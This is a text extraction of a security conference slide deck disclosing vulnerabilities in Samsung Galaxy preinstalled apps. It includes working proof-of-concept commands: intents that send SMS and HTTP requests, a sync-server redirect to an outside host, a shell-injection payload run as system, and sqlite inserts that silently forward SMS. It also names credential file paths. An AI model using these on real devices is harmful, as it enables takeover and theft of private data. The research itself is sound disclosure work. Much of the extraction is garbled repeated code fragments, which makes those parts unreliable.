Android OEM's applications (in)security and backdoors ... - QuarksLAB

Android OEM’s applications (in)security and 

backdoors without permission 

André Moulu 

amoulu@quarkslab.com

Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation 

Plan 

1 Context and objectives 

2 Android introduction 

3 Android security model 

4 Methodology 

5 Toward a backdoor without permission 

6 Post-exploitation 

7 Scope of the vulnerabilities 

8 Conclusion


Context and objectives 

Why Android? 

Most used mobile OS 

Security often questioned because of many malwares 

Unofficial markets (warez) 

Show off how an application without any permission can take 

control of a smartphone


Context and objectives 

Targeted user 

Security aware user 

Doesn’t use alternative markets 

Checks permissions before installing an application 

Targeted smartphone 

Samsung Galaxy S3 (I9300) 

50 millions copies sold (March 2013) 

Actually, the Samsung frontend on the I9300 

Some of these applications may also be present on other models 

Some vulnerabilities may impact other models (S2, S4, Note 1/2, ...) 

The vulnerable applications can’t be deleted without root access


Plan 




4 Methodology 




8 Conclusion


Plan 



Android system and the applications 

Classical components of an Android application 

The communication between components 

The exposition of components 


4 Methodology 


6 Post-exploitation


Android system and the applications 

The Android system 

Generalities and common knowledge 

Mobile OS (smartphone/tablet) ”open source” 

Based on Linux 

Developed in C and Java 

A special virtual machine: DalvikVM 

Dalvik Bytecode (DEX/ODEX) 

What is an Android application ? 

APK file (actually a ZIP file) 

APK’s most important files: 

AndroidManifest.xml (configuration, permissions, components, ...) 

classes.dex (executable bytecode) 

Native libraries as .so files (JNI) 

Each application has an unique name (packagename) and is signed 

by his developper (certificate)



The applicative components


















The Intent: source of communication in Android















Can we talk to this component? 

exported or not, that’s the question 

By default, components are not exported 

Special case: ContentProvider 

The component status, exported or not, is defined by 

AndroidManifest.xml 

The attribute exported=[true|false] 

Presence of an intent-filter (the component is automatically 

exported) 

A component can be exported but protected by a permission



Example of AndroidManifest.xml 

1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22




1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22




1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22




1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22




1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22




1 

2 

4 

5 

6 

7 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22


Plan 




Applications isolation 

The permission system 

4 Methodology 



7 Scope of the vulnerabilities


Applications isolation 

One user per application 

Security by isolation 

Default behaviour: 

Each application has a dedicated user (and therefore an UID) on the 

system 

Special case: 

An application can ask to share an UID with another application 

sharedUserId mechanism (AndroidManifest.xml) 

In order to share an UID, 2 applications must be signed with the 

same certificate 

Consequences 

Isolation between application in memory (process) 

Isolation on the filesystem 

Don’t protect against world readable/writeable files



Application restrictions 

Least privilege security 

Permission to protect against dangerous actions: 

SD card write access, INTERNET access, sending SMS, ... 

By default, an application doesn’t have any permission 

You need to ask for them explicitly in AndroidManifest.xml 

Asked permissions are shown to the user at installation 

Boolean choice 

A permission can protect: 

Functions: AccountManager.getAccounts() (GET_ACCOUNTS) 

Intents: android.intent.action.CALL (CALL_PHONE) 

Components: content://contacts (READ_CONTACTS, ...) 

A permission is given to an UID and not to a packagename 

Permission model is applied on native code too 

All permissions of each application with the same sharedUserId are 

combined



Application restrictions 

Consequences of the permission model 

Components can be protected 

The user ”knows” what the application can do when it is installed, 

thus the associated risks 

Limit the impact in case of vulnerable application


Plan 




4 Methodology 

A huge surface attack 

Vulnerability research 






The attack surface 

Important folders 

We want to do a backdoor targeting an Android smartphone 

Userland vulnerabilities (easy to find, easy to exploit) 

Folders customized by constructors on an Android smartphone: 

/system/app 

/system/framework 

/system/bin 

/system/lib 

The content of these folders may change between operators




A large number of applications 

Only two folders examined, but a consequent attack surface 

216 APK in /system/app 

To compare: 91 APK for the Nexus 4



Automation 

Constraints 

Many application, need automation to find interesting applications 

Then audit by hand (reverse engineering) 

Exploitation of vulnerabilities with a little amount or no permission 

at all 

Creation of some scripts: ASA 

Based on Androguard (great framework) 

ASAManifest: Analyzes the manifest of an application and tells 

which components are exported and under what conditions 

ASADatabase: Analyzes a large amount of applications like 

ASAManifest does and checks for sensitive API usage. The results 

are stored in MongoDB database. 

ASADiff (ongoing): Diff between two versions of a system, by 

example to detect vulnerability patching.



ASAManifest



ASADatabase: examples of queries on MongoDB 

Applications with INSTALL PACKAGES permission 

> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}) 

{ "filename" : "DttSupport.apk" } 

{ "filename" : "Kies.apk" } 

{ "filename" : "MtpApplication.apk" } 

{ "filename" : "PackageInstaller.apk" } 

[...] 

Number of sharedUserId system applications 

> db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count() 

41 

Which one really use INSTALL PACKAGES ? 

> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count() 

11 

> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true}, 

{filename:1,_id:0}).count() 

10 

> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false}, 

{filename:1,_id:0}) 

{ "filename" : "MtpApplication.apk" }


Plan 




4 Methodology 


Backdoor’s features 

SD Card: Android and the retrocompatibility... 

SMS/MMS sending and files exfiltration 

Arbitrary HTTP requests execution 

Getting C.R.U.D rights on SMS/Contacts/Memo and more 

Sync for fun and profit 

I dont need root when i have system


Backdoor’s features 

Objectives



SD Card: a protected storage? 

Once upon a time... Android 

First versions: total access to the SD Card 

read & write access






read & write access 

Current state 

Write access: WRITE EXTERNAL STORAGE 

Read access: currently ”tolerated” without permission 

Dangerous for user privacy (internet + sdcard) 

Introduction of the READ EXTERNAL STORAGE permission 

”Protect the SD Card” in system parameters (JB)






read & write access 

Current state 

Write access: WRITE EXTERNAL STORAGE 

Read access: currently ”tolerated” without permission 

Dangerous for user privacy (internet + sdcard) 

Introduction of the READ EXTERNAL STORAGE permission 

”Protect the SD Card” in system parameters (JB) 

And what about the retrocompatibility? 

From the android documentation, if minSdkVersion and 

targetSdkVersion



Objectives



Vuln1 - SecMms.apk 

The malwares and premium SMS 

Current Android malwares ask for the SEND SMS permission 

Easily detectable and suspect for an user 

What about a malware which can send premium SMS without asking 

for permission?








for permission? 

There is an app for that 

SecMms.apk 

exported BroadcastReceiver -> ui.MmsBGSender 

An well formatted Intent allows to send arbitrary SMS/MMS








for permission? 

There is an app for that 

SecMms.apk 

exported BroadcastReceiver -> ui.MmsBGSender 

An well formatted Intent allows to send arbitrary SMS/MMS 

PoC (attachments can also be added) 

shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*" 

--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"



Objectives



Vuln2 - PCWClientS.apk 

PCWReceiver 

When an Intent is received with 

com.sec.pcw.device.HTTP_REQUEST_RETRY as action 

The body, uri and pushType attributed are extracted and an 

HTTP POST request is executed based on it 

PoC 

shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri 

*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*



Objectives



Vuln3 - wssyncmlnps.apk 

Typical problems with constructor frontend 

This vulnerability was patched by Samsung before we reported it 

Patched on the S3 but not on the S2, Tab 1, Note 1 

Special case: INTERNET permission is needed 

creation of a socket 

smlNpsReceiver 

The application exports a BroadcastReceiver smlNpsReceiver 

Answers to Intent related to Kies 

com.intent.action.KIES WSSERVICE START 

com.intent.action.KIES WSSERVICE START WIFI





1 public void onReceive(Context paramContext, Intent paramIntent) 

2 { 

3 [...] 

4 if(paramIntent.getAction(). 

5 equals("com.intent.action.KIES_WSSERVICE_START")) 

6 { 

7 smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START"); 

8 wifi_connected = false; 

9 usb_connected = true; 

10 paramContext.stopService( 

11 new Intent(paramContext, smlNpsService.class) 

12 ); 

13 paramContext.startService( 


15 ); 

16 } 

17 [...] 

18 }






2 { 

3 [...] 



6 { 






12 ); 



15 ); 

16 } 

17 [...] 

18 }






2 { 

3 [...] 



6 { 






12 ); 



15 ); 

16 } 

17 [...] 

18 }






2 { 

3 [...] 



6 { 






12 ); 



15 ); 

16 } 

17 [...] 

18 }




smlNpsService 

When it starts, it runs NpsServiceTask in a thread 

Listens on 0.0.0.0:1108 (TCP) 

Each connection is handled by smlNpsHandler in a separated thread 

The method work() is called to handle the received data




smlNpsHandler.work() 

1 protected void work() 

2 { 

3 if(this.socket != 0) 

4 { 

5 socketIS = this.socket.getInputStream(); 

6 socketOS = this.socket.getOutputStream(); 

7 cmdLine = this.readLine(socketIS); 

8 if((cmdLine != 0) && (cmdLine.length() != 0)) 

9 { 

10 cmdInformation = new String[3]; 

11 v5 = cmdLine.indexOf("BEGIN"); 

12 cmdInformation[0] = cmdLine.substring(0, 3); 

13 if(v5






2 { 


4 { 





9 { 




13 if(v5






2 { 


4 { 





9 { 




13 if(v5






2 { 


4 { 





9 { 




13 if(v5






2 { 


4 { 





9 { 




13 if(v5






2 { 


4 { 





9 { 




13 if(v5





1 case 70: 

2 v1 = this.GetContact(cmdInformation[1]); 

3 v2 = 0; 

4 break; 

5 [...] 

6 case 72: 

7 v1 = this.GetContactsIndexArray( 

8 com.wssnps.database.smlContactItem$StorageType. 

SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId()); 

9 v2 = 0; 

10 break; 

11 [...] 

12 case 90: 

13 v1 = this.GetCalendar(cmdInformation[1]); 

14 v2 = 0; 

15 break; 

16 [...]





1 case 70: 


3 v2 = 0; 

4 break; 

5 [...] 

6 case 72: 




9 v2 = 0; 

10 break; 

11 [...] 

12 case 90: 


14 v2 = 0; 

15 break; 

16 [...]





1 case 70: 


3 v2 = 0; 

4 break; 

5 [...] 

6 case 72: 




9 v2 = 0; 

10 break; 

11 [...] 

12 case 90: 


14 v2 = 0; 

15 break; 

16 [...]





1 case 453: 

2 v1 = Integer.valueOf(cmdInformation[1].trim()).intValue(); 

3 if(v1





1 case 453: 


3 if(v1





1 case 453: 


3 if(v1




PoC 

$ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_START 

Broadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START } 

Broadcast completed: result=0 

$ adb shell netstat |grep 1108 

tcp6 0 0 :::1108 :::* LISTEN 

$ adb forward tcp:1108 tcp:1108 

$ nc localhost 1108 -v 

Connection to localhost 1108 port [tcp/*] succeeded! 

090 1 # getCalendar(1) 

0 

BEGIN:VCALENDAR 

VERSION:1.0 

BEGIN:VEVENT 

SUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013 

DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Conf 

LOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Rennes 

DTSTART:20130605T170000Z 

DTEND:20130607T180000Z 

X-ALLDAY:UNSET 

X-CALENDARGROUP:1 

UID:000000000000000000000000000000000000000000000001 

END:VEVENT 

END:VCALENDAR




PoC 

072 # get the id of contacts on the smartphone (not the SIM) 

0 

2 # number of contact 

8,9, # id of the contacts 

070 9 # getContact(9) 

0 

BEGIN:VCARD 

VERSION:2.1 

N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;; 

TEL;HOME;CELL:06 06 06 06 06 

EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:kevin@hotmail.com 

X-DIRTY:1 

X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phone 

END:VCARD 

453 32 # install APK from /sdcard/restore/ 

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 

Some available features... 

C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/... 

Backup of mail accounts 

Installation of arbitrary application




How it was patched? 

Permission added on the component for the action 

KIES_WSSERVICE_START 

android.permission.COM_WSSNPS has a protectionLevel of 

signatureOrSystem



Objectives



Vuln4 - Sync and remote control applications... 

FmmDM, FmmDS, ... 

There are applications to do data sync and remote control of the 

smartphone 

”Security” => ”Remote controls” 

The user can remote control his phone via http://samsungdive.com/



Vuln4 - sync and remote control applications... 

Vulnerabilities 

These applications export a BroadcastReceiver 

With the correct Intent, you can change the default server used for 

sync and remote control by the smartphone 

Poc for FmmDM 

shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL 

--es DMServer "http://sh4ka.fr:80/test/trololo.php"



Vuln4 - sync and remote control applications...



Vuln4 - sync and remote control applications...


I dont need root when i have system 

Vuln5 - serviceModeApp.apk 

ASADatabase to the rescue 

Search in the database for applications with: 

sharedUserId = system 

Usage of API for command execution/dynamic code loading 

Among these applications: serviceModeApp.apk 

A strange AndroidManifest.xml file 

1 

2 

3 

4 

5 

6 

8 

9 

10 

11










1 

2 

3 

4 

5 

6 

8 

9 

10 

11










1 

2 

3 

4 

5 

6 

8 

9 

10 

11










1 

2 

3 

4 

5 

6 

8 

9 

10 

11




FTATDumpReceiver.onReceive() 


2 { 

3 String str1 = paramIntent.getAction(); 

4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1); 

5 if (str1.equals("com.android.sec.FTAT_DUMP")) 

6 { 

7 String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME"); 

8 Calendar localCalendar = Calendar.getInstance(); 

9 String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get 

(1)); 

10 [...] 


(13)); 

12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9); 

13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class); 

14 localIntent2.setFlags(268435456); 

15 localIntent2.putExtra("FILENAME", str9); 

16 paramContext.startService(localIntent2); 

17 } 

18 [...] 

19 }






2 { 




6 { 




(1)); 

10 [...] 


(13)); 






17 } 

18 [...] 

19 }






2 { 




6 { 




(1)); 

10 [...] 


(13)); 






17 } 

18 [...] 

19 }






2 { 




6 { 




(1)); 

10 [...] 


(13)); 






17 } 

18 [...] 

19 }






2 { 




6 { 




(1)); 

10 [...] 


(13)); 






17 } 

18 [...] 

19 }




FTATDumpService.onStartCommand() 

1 public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2) 

2 { 

3 Log.i("FTATDumpService", "onStartCommand()"); 

4 this.mHandler.sendEmptyMessage(1005); 

5 final String str = paramIntent.getStringExtra("FILENAME"); 

6 [...] 

7 new Thread(new Runnable() 

8 { 

9 public void run() 

10 { 

11 FTATDumpService.this.sendMessage( 

12 FTATDumpService.access$600(FTATDumpService.this), 

13 FTATDumpService.this.mHandler.obtainMessage(1014) 

14 ); 

15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + " 

.log")) 

16 FTATDumpService.this.mHandler.sendEmptyMessage(1015); 

17 [...] 

18 } 

19 }).start(); 

20 return 0; 

21 }






2 { 




6 [...] 


8 { 


10 { 




14 ); 


.log")) 


17 [...] 

18 } 

19 }).start(); 

20 return 0; 

21 }






2 { 




6 [...] 


8 { 


10 { 




14 ); 


.log")) 


17 [...] 

18 } 

19 }).start(); 

20 return 0; 

21 }






2 { 




6 [...] 


8 { 


10 { 




14 ); 


.log")) 


17 [...] 

18 } 

19 }).start(); 

20 return 0; 

21 }






2 { 




6 [...] 


8 { 


10 { 




14 ); 


.log")) 


17 [...] 

18 } 

19 }).start(); 

20 return 0; 

21 }



Vuln5 - serviceModeApp.apk




FTATDumpService.doShellCmd() 

1 private boolean DoShellCmd(String paramString) 

2 { 

3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramString); 

4 String[] arrayOfString = new String[3]; 

5 arrayOfString[0] = "/system/bin/sh"; 

6 arrayOfString[1] = "-c"; 

7 arrayOfString[2] = paramString; 

8 Log.i("FTATDumpService", "exec␣command"); 

9 Runtime.getRuntime().exec(arrayOfString).waitFor(); 

10 Log.i("FTATDumpService", "exec␣done"); 

11 Log.i("FTATDumpService", "DoShellCmd␣done"); 

12 return true; 

13 }






2 { 











13 }






2 { 











13 }






2 { 











13 }



Srsly?




PoC 

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP 

--es FILENAME ’../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#’ 

Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) } 

Broadcast completed : result=0 

$ adb shell cat /sdcard/shellescape 

uid=1000(system) gid=1000(system) groups=1001(radio),1006(camera), 

1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache), 

3001(net_bt_admin),3002(net_bt),3003(inet),3007(net_bw_acct)



Inventory of the permissions obtained 

Inventory 

Combination of all the permissions of sharedUserId=system 

applications 

A total of 156 permissions 

Like android.permission.INSTALL_PACKAGE (pm install 

package.apk) 

Like access to mail accounts, SMS, internet, ... 

We can inject code inside other applications (dalvik-cache) 

Sensitive informations can be read 

Wifi keys: /data/misc/wifi/wpa supplicant.conf 

Password/pincode/pattern: guesture.key, password.key, ... 

Mail accounts and Google Account token: 

/data/system/user/X/accounts.db



Objectives


Plan 




4 Methodology 



Samsung MDM for fun and laziness 

I can haz your sms? 




The Samsung’s MDM : SAFE 

Discovery of SAFE 

SAmsung For Enterprise: A framework for Samsung models 

Expose an API for the commercial MDMs 

Used partly by SamsungDive 

Implemented partly in /system/framework/services.odex 

Study of the permission system 

Many modules : BrowserPolicy, DevicePolicy, ... 

Each module checks that the calling application has the correct 

permission: 

One permission per module : android.permission.sec.MDM_XXX 

Enforcement via enforceXXXPermission()



The Samsung’s MDM : SAFE 

Discovery of SAFE 

SAmsung For Enterprise: A framework for Samsung models 

Expose an API for the commercial MDMs 

Used partly by SamsungDive 

Implemented partly in /system/framework/services.odex 

Study of the permission system 

Many modules : BrowserPolicy, DevicePolicy, ... 

Each module checks that the calling application has the correct 

permission: 

One permission per module : android.permission.sec.MDM_XXX 

Enforcement via enforceXXXPermission() 

SAFE : The god mode 

The framework doesn’t check the permission when the calling application 

is system (UID = 1000)



SAFE: The god mode 

MDM Usage without any restriction 

The features implemented (for us?): 

Application Policy - application backup, application uninstall, ... 

Mail Account Policy - Manage mail accounts, behaviour when 

SSL certificates are invalid, ... 

Enterprise VPN Policy - Retrieving of the certificates, passwords, 

... 

Phone Restriction - Block WiFi, VPN connection, USB Debug, 

OTA firmware updates, reset to factory settings, ... 

Misc Policy - Retrieve the clipboard content, ... 

We can ”infect” someone and prevent him from receiving firmware 

updates that corrects vulnerabilities.



SMS Forwarding 

DSMLawmo.apk 

Study of the applications listening for incomming SMS 

BroadcastReceiver listening for Intent with action 

android.provider.Telephony.SMS_RECEIVED 

DSMLawmo.apk seems to have an interesting functionality... 

[...] 

if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction())) 

{ 

Util.Logd("Start to SMS forwarding service"); 

[...]




DSMSMSReceiver 

onReceive() of DSMSMSReceiver checks that: 

If a SMS just arrived and I have not received it recently 

If the SMS forwarding is enabled 

SMSForwarding key in the object DSMRepository 

If all these conditions are met, the smartphone forwards the SMS to 

the configured phone number 

Transparent to the user... 

DSMRepository 

DSMRepository query a ContentProvider: 

content://com.sec.dsm.system.dsmcontentprovider/dsm 

sqlite db -> /data/data/com.sec.dsm.system/databases/profile.db 

dsm table, column Key = SMSForward?




PoC (Will not be patched, it’s a feature!) 

system@android:/data/data/com.sec.dsm.system/databases $ ls -al 

-rw-rw---- system system 16384 2013-01-18 22:18 profile.db 

system@android:/data/data/com.sec.dsm.system/databases $ sqlite3 

sqlite> insert into dsm values(null,"SMSForwarding","Enable"); 

sqlite> insert into dsm values(null,"SMSRecipient","+33*NUMERO*");


Plan 




4 Methodology 




8 Conclusion


Scope of the vulnerabilities 

Model Release date V1 V2 V3 V4 V5 

Samsung Galaxy S2 05/2011 ̌ ̌ ̌ ̌ - 

Samsung Galaxy Tab 1 06/2011 N.A ̌ ̌ ̌ - 

Samsung Galaxy Note 1 11/2011 ̌ - ̌ - - 

Samsung Galaxy S3 05/2012 ̌ ̌ ̌ ̌ ̌ 

Samsung Galaxy Tab 2 05/2012 N.A ̌ - ̌ ̌ 

Samsung Galaxy Note 2 10/2012 - ̌ - ̌ ̌ 

Samsung Galaxy S3 mini 11/2012 - ̌ - ̌ ̌ 

Samsung Galaxy S4 04/2013 - - - - - 

Numéro Description 

V1 SMS/MMS sending and files exfiltration 

V2 Arbitrary HTTP requests execution 

V3 Getting C.R.U.D rights on SMS/Contacts/Memo and more 

V4 Sync and remote control for fun and profit 

V5 System app escape shell


Plan 




4 Methodology 




8 Conclusion


Conclusion 

Agenda 

03/26 - A dozen of vulnerabilities reported to Samsung 

04/18 - Samsung has finished to analyze our vulnerabilities 

06/06 - No patch is currently deployed on the Samsung models 

The vulnerabilities are patched in the Android 4.2.2 I9300 leaked 

ROM, the release date is scheduled for June


Conclusion 

The vulnerabilities 

The vulnerabilities are easy to find and exploit 

It’s not only Samsung, we have seen similar vulnerabilities on other 

(all?) constructors... 

Often, only a permission on the right component is needed to 

prevent the vulnerability 

The Samsung frontend is bigger and bigger on each release, 

expanding the attack surface... 

Google needs to do something, because the constructors weaken the 

security of Android


Conclusion 

Some solutions ? 

Antivirus? pretty useless on Android (only signature based?) 

Flash a custom ROM found on Internet and without the Samsung 

frontend? 

Do you trust the ROM creator? 

Since Jelly Bean, there is SELinux on Android 

If correctly used, it can solve many problems 

But it’s hard for an enduser to configure it... 

Configuration must be done by the constructors, who need to do a 

good job here 

And when you saw their applications... not really confident about this 

Buy Nexus phones or the Samsung Galaxy S4 ”Google Edition”


Thank you for your attention 

Questions?

contact@quarkslab.com I @quarkslab.com

Android OEM's applications (in)security and backdoors ... - QuarksLAB

Create successful ePaper yourself

Delete template?

Save as template?